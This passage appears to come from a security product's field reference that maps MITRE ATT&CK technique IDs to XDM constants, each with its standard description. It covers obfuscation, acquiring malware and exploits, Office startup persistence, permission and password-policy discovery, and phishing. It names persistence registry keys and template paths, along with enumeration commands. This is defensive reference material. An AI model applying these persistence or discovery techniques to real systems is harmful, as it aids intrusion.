uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections
targeting executables/binaries. These payloads will need to be compiled before execution; typically via
native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018) Source code
payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as
a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats
unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being
(re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation:
TrendMicro WindowsAppMac) https://attack.mitre.org/techniques/T1027/004

T1027.006 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_HTML_SMUGGLING Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of
seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs
(immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also
be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents.
HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML
Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018) Adversaries may deliver
payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs
and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled
malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such
as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML
files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e.
[Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially
bypassing content filters. For example, JavaScript Blobs can be abused to dynamically generate malicious
files in the victim machine and may be dropped to disk by abusing JavaScript functions such as
msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)
(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017) https://
attack.mitre.org/techniques/T1027/006

T1027.005 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_INDICATOR_REMOVAL_FROM_TOOLS Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined,
or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version
that is no longer detected by the target's defensive systems or subsequent targets that may use similar
systems. A good example of this is when malware is detected with a file signature and quarantined by anti-
virus software. An adversary who can determine that the malware was quarantined because of its file
signature may modify the file to explicitly avoid that signature, and then re-use the malware. https://
attack.mitre.org/techniques/T1027/005

T1027.002 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_SOFTWARE_PACKING Adversaries may perform software packing or virtual machine software protection to conceal their code.
Software packing is a method of compressing or encrypting an executable. Packing an executable changes
the file signature in an attempt to avoid signature-based detection. Most decompression techniques
decompress the executable code in memory. Virtual machine software protection translates an executable's
original code into a special format that only a special virtual machine can run. A virtual machine is then
called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are
called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is
available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques
that do not leave the same artifacts as well-known packers to evade defenses. https://attack.mitre.org/
techniques/T1027/002

T1027.003 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_STEGANOGRAPHY Adversaries may use steganography techniques in order to prevent the detection of hidden information.
Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video
clips, or text files. [Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that
used steganography. It encrypted the gathered information from a victim's system and hid it within an image
before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) By the end of 2017, a threat group
used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an
image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://
attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence
from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc
Targets Pyeongchang Olympics) https://attack.mitre.org/techniques/T1027/003

T1588 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing
their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may
include the acquisition of malware, software (including licenses), exploits, certificates, and information
relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout
numerous phases of the adversary lifecycle. In addition to downloading free malware, software, and
exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party
entities can include technology companies that specialize in malware and exploits, criminal marketplaces,
or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab) In addition to purchasing
capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This
can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed
databases of vulnerabilities or exploits.(Citation: DiginotarCompromise) https://attack.mitre.org/techniques/
T1588

T1588.003 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_CODE_SIGNING_CERTIFICATES Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing
is the process of digitally signing executables and scripts to confirm the software author and guarantee that
the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from
the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code
Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code
even if they don't know who issued the certificate or who the author is. Prior to [Code Signing](https://
attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use
in operations. The purchase of code signing certificates may be done using a front organization or using
information stolen from a previously compromised entity that allows the adversary to validate to a certificate
provider as that entity. Adversaries may also steal code signing materials directly from a compromised
third-party. https://attack.mitre.org/techniques/T1588/003

T1588.004 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_DIGITAL_CERTIFICATES Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS
certificates are designed to instill trust. They include information about the key, information about its owner's
identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the
signature is valid, and the person examining the certificate trusts the signer, then they know they can use
that key to communicate with its owner. Adversaries may purchase or steal SSL/TLS certificates to further
their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/
techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even
enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or
otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/
T1553/004)). The purchase of digital certificates may be done using a front organization or using
information stolen from a previously compromised entity that allows the adversary to validate to a certificate
provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-
party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or
hijack domains that they will later purchase an SSL/TLS certificate for. Certificate authorities exist that allow
adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's
Encrypt FAQ) After obtaining a digital certificate, an adversary may then install that certificate (see [Install
Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.
https://attack.mitre.org/techniques/T1588/004
Original Mapped Description

T1588.005 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_EXPLOITS Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes
advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on
computer hardware or software. Rather than developing their own exploits, an adversary may find/modify
exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation:
TempertonDarkHotel)(Citation: NationsBuying) In addition to downloading free exploits from the internet,
adversaries may purchase exploits from third-party entities. Third-party entities can include technology
companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from
individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing
exploits, adversaries may steal and repurpose exploits from third-party entities (including other
adversaries).(Citation: TempertonDarkHotel) An adversary may monitor exploit provider forums to
understand the state of existing, as well as newly discovered, exploits. There is usually a delay between
when an exploit is discovered and when it is made public. An adversary may target the systems of those
known to conduct exploit research and development in order to gain that knowledge for use during a
subsequent operation. Adversaries may use exploits during various phases of the adversary lifecycle (i.e.
[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client
Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://
attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/
T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of
Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation]
(https://attack.mitre.org/techniques/T1499/004)). https://attack.mitre.org/techniques/T1588/005

T1588.001 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_MALWARE Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can
include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries
may acquire malware to support their operations, obtaining a means for maintaining control of remote
machines, evading defenses, and executing post-compromise behaviors. In addition to downloading free
malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party
entities can include technology companies that specialize in malware development, criminal marketplaces
(including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware,
adversaries may steal and repurpose malware from third-party entities (including other adversaries). https://
attack.mitre.org/techniques/T1588/001

T1588.002 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_TOOL Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be
open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but
(unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/
software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including
for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software
may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial
versions.(Citation: Recorded Future Beacon 2019) Adversaries may obtain tools to support their operations,
including to support execution of post-compromise behaviors. In addition to freely downloading or
purchasing software, adversaries may steal software and/or software licenses from third-party entities
(including other adversaries). https://attack.mitre.org/techniques/T1588/002

T1588.006 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_VULNERABILITIES Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability
is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to
cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by
searching open databases or gaining access to closed vulnerability databases.(Citation: National
Vulnerability Database) An adversary may monitor vulnerability disclosures/databases to understand the
state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a
vulnerability is discovered and when it is made public. An adversary may target the systems of those known
to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause
an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005))
or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).
https://attack.mitre.org/techniques/T1588/006

T1137 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft
Office is a fairly common application suite on Windows-based operating systems within an enterprise
network. There are multiple mechanisms that can be used with Office for persistence when an Office-based
application is started; this can include the use of Office Template Macros and add-ins. A variety of features
have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms,
and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within
Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) https://attack.mitre.org/
techniques/T1137

T1137.006 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_ADD_INS Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office
add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are
different types of add-ins that can be used by the various Office products; including Word/Excel add-in
Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins,
VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs
Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018) Add-ins can be used to obtain persistence
because they can be set to execute code when an Office application starts. https://attack.mitre.org/
techniques/T1137/006

T1137.001 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OFFICE_TEMPLATE_MACROS Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system.
Microsoft Office contains templates that are part of common Office applications and are used to customize
styles. The base templates within the application are used each time an application starts. (Citation:
Microsoft Change Normal Template) Office Visual Basic for Applications (VBA) macros (Citation: MSDN
VBA in Office) can be inserted into the base template and used to execute code when the respective Office
application starts in order to obtain persistence. Examples for both Word and Excel have been discovered
and published. By default, Word has a Normal.dotm template created that can be modified to include a
malicious macro. Excel does not have a template file created by default, but one can be added that will
automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros)
Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun
2019) Word Normal.dotm location:
C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm Excel Personal.xlsb
location:
C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB Adversaries
may also change the location of the base template to point to their own by hijacking the application's search
order, e.g. Word 2016 will first look for Normal.dotm under C:\Program Files (x86)\Microsoft
Office\root\Office16\, or by modifying the GlobalDotName registry key. By modifying the
GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to
use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may
first need to register the template as a trusted document or place it in a trusted location.(Citation:
GlobalDotName Jun 2019) An adversary may need to enable macros to execute unrestricted depending on
the system or enterprise security policy on use of macros. https://attack.mitre.org/techniques/T1137/001

T1137.002 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OFFICE_TEST Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a
compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL
that will be executed every time an Office application is started. This Registry key is thought to be used by
Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This
Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation:
Palo Alto Office Test Sofacy) There exist user and global Registry keys for the Office Test feature: *
HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf *
HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf Adversaries may add this
Registry key and specify a malicious DLL that will be executed whenever an Office application, such as
Word or Excel, is started. https://attack.mitre.org/techniques/T1137/002

T1137.003 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OUTLOOK_FORMS Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook
forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms
can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the
same custom Outlook form.(Citation: SensePost Outlook Forms) Once malicious forms have been added to
the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an
adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms) https://
attack.mitre.org/techniques/T1137/003
Original Mapped Description

T1137.004 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OUTLOOK_HOME_PAGE Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised
system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This
feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A
malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation:
SensePost Outlook Home Page) Once malicious home pages have been added to the user’s mailbox, they
will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is
loaded/reloaded.(Citation: SensePost Outlook Home Page) https://attack.mitre.org/techniques/T1137/004

T1137.005 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OUTLOOK_RULES Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook
rules allow a user to define automated behavior to manage email messages. A benign rule might, for
example, automatically move an email to a particular folder in Outlook if it contains specific words from a
specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary
sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules) Once malicious rules
have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will
execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook
Rules) https://attack.mitre.org/techniques/T1137/005

T1201 XDM_CONST.MITRE_TECHNIQUE_PASSWORD_POLICY_DISCOVERY Adversaries may attempt to access detailed information about the password policy used within an
enterprise network or cloud environment. Password policies are a way to enforce complex passwords that
are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This
information may help the adversary to create a list of common passwords and launch dictionary and/or
brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not
trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is
set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and
macOS systems via various command shell utilities such as net accounts (/domain), Get-
ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy
getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password
Policies). Password policies can be discovered in cloud environments using available APIs such as
GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). https://attack.mitre.org/
techniques/T1201

T1120 XDM_CONST.MITRE_TECHNIQUE_PERIPHERAL_DEVICE_DISCOVERY Adversaries may attempt to gather information about attached peripheral devices and components
connected to a computer system. Peripheral devices could include auxiliary resources that support a variety
of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The
information may be used to enhance their awareness of the system and network environment or may be
used for further actions. https://attack.mitre.org/techniques/T1120

T1069 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY Adversaries may attempt to find group and permission settings. This information can help adversaries
determine which user accounts and groups are available, the membership of users in particular groups, and
which users and groups have elevated permissions. https://attack.mitre.org/techniques/T1069

T1069.003 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY_CLOUD_GROUPS Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission
groups can help adversaries determine the particular roles of users and groups within an environment, as
well as which users are associated with a particular group. With authenticated access there are several
tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to
obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)
(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide
interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups
associated to a user account for Azure while the API endpoint GET https://
cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google
(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud
Identity API Documentation). Adversaries may attempt to list ACLs for objects to determine the owner and
other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get
Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or
leverage accounts they have already compromised to access the object. https://attack.mitre.org/techniques/
T1069/003

T1069.002 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY_DOMAIN_GROUPS Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-
level permission groups can help adversaries determine which groups exist and which users belong to a
particular group. Adversaries may use this information to determine which users have elevated
permissions, such as domain administrators. Commands such as net group /domain of the [Net](https://
attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can
list domain-level groups. https://attack.mitre.org/techniques/T1069/002

T1069.001 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY_LOCAL_GROUPS Adversaries may attempt to find local system groups and permission settings. The knowledge of local
system permission groups can help adversaries determine which groups exist and which users belong to a
particular group. Adversaries may use this information to determine which users have elevated
permissions, such as the users found within the local administrators group. Commands such as net
localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on
macOS, and groups on Linux can list local groups. https://attack.mitre.org/techniques/T1069/001

T1566 XDM_CONST.MITRE_TECHNIQUE_PHISHING Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are
electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In
spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally,
adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries
may send victims emails containing malicious attachments or links, typically to execute malicious code on
victim systems. Phishing may also be conducted via third-party services, like social media platforms.
Phishing may also involve social engineering techniques, such as posing as a trusted source. https://
attack.mitre.org/techniques/T1566

T1598 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION Adversaries may send phishing messages to elicit sensitive information that can be used during targeting.
Phishing for information is an attempt to trick targets into divulging information, frequently credentials or
other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/
techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious
code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known
as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the
adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential
harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of
emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media
Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)
(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such
as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/
techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending
multiple, seemingly urgent messages. https://attack.mitre.org/techniques/T1598

T1598.002 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION_SPEARPHISHING_ATTACHMENT Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information
that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging
information, frequently credentials or other actionable information. Spearphishing for information frequently
involves social engineering techniques, such as posing as a source with a reason to collect information (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of
spearphishing are electronically delivered social engineering targeted at a specific individual, company, or
industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the
recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub
Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be
filled-in, such as a request for information from a business associate. Adversaries may also use information
from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/
techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft
persuasive and believable lures. https://attack.mitre.org/techniques/T1598/002
Original Mapped Description

T1598.003 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION_SPEARPHISHING_LINK Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can
be used during targeting. Spearphishing for information is an attempt to trick targets into divulging
information, frequently credentials or other actionable information. Spearphishing for information frequently
involves social engineering techniques, such as posing as a source with a reason to collect information (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of
spearphishing are electronically delivered social engineering targeted at a specific individual, company, or
industry. In this scenario, the malicious emails contain links generally accompanied by social engineering
text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro
Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in
appearance and have a URL containing elements from the real site. From the fake website, information is
gathered in web forms and sent to the attacker. Adversaries may also use information from previous
reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and
believable lures. https://attack.mitre.org/techniques/T1598/003

T1598.001 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION_SPEARPHISHING_SERVICE Adversaries may send spearphishing messages via third-party services to elicit sensitive information that
can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging
information, frequently credentials or other actionable information. Spearphishing for information frequently
involves social engineering techniques, such as posing as a source with a reason to collect information (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of
spearphishing are electronically delivered social engineering targeted at a specific individual, company, or
industry. In this scenario, adversaries send messages through various social media services, personal
webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These
services are more likely to have a less-strict security policy than an enterprise. As with most kinds of
spearphishing, the goal is to generate rapport with the target or get the target's interest in some way.
Adversaries may create fake social media accounts and message employees for potential job opportunities.
Doing so allows a plausible reason for asking about services, policies, and information about their
environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social
Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://
attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. https://attack.mitre.org/
techniques/T1598/001

T1566.001 XDM_CONST.MITRE_TECHNIQUE_PHISHING_SPEARPHISHING_ATTACHMENT Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to
victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment
is different from other forms of spearphishing in that it employs the use of malware attached to an email. All
forms of spearphishing are electronically delivered social engineering targeted at a specific individual,
company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely
upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may
also involve social engineering techniques, such as posing as a trusted source. There are many options for
the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening
the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or
directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible
reason why the file should be opened, and may explain how to bypass system protections in order to do so.
The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in
order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in
order to make attached executables appear to be document files, or files exploiting one application appear
to be a file for a different one. https://attack.mitre.org/techniques/T1566/001

T1566.002 XDM_CONST.MITRE_TECHNIQUE_PHISHING_SPEARPHISHING_LINK Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim
systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of
spearphishing in that it employs the use of links to download malware contained in email, instead of
attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All
forms of spearphishing are electronically delivered social engineering targeted at a specific individual,
company, or industry. In this case, the malicious emails contain links. Generally, the links will be
accompanied by social engineering text and require the user to actively click or copy and paste a URL into
a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may
compromise the web browser using an exploit, or the user will be prompted to download applications,
documents, zip files, or even executables depending on the pretext for the email in the first place.
Adversaries may also include links that are intended to interact directly with an email reader, including
embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web
bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application
Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to
protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017) https://
attack.mitre.org/techniques/T1566/002

T1566.003 XDM_CONST.MITRE_TECHNIQUE_PHISHING_SPEARPHISHING_VIA_SERVICE Adversaries may send spearphishing messages via third-party services in an attempt to gain access to
victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other
forms of spearphishing in that it employs the use of third party services rather than directly via enterprise
email channels. All forms of spearphishing are electronically delivered social engineering targeted at a
specific individual, company, or industry. In this scenario, adversaries send messages through various
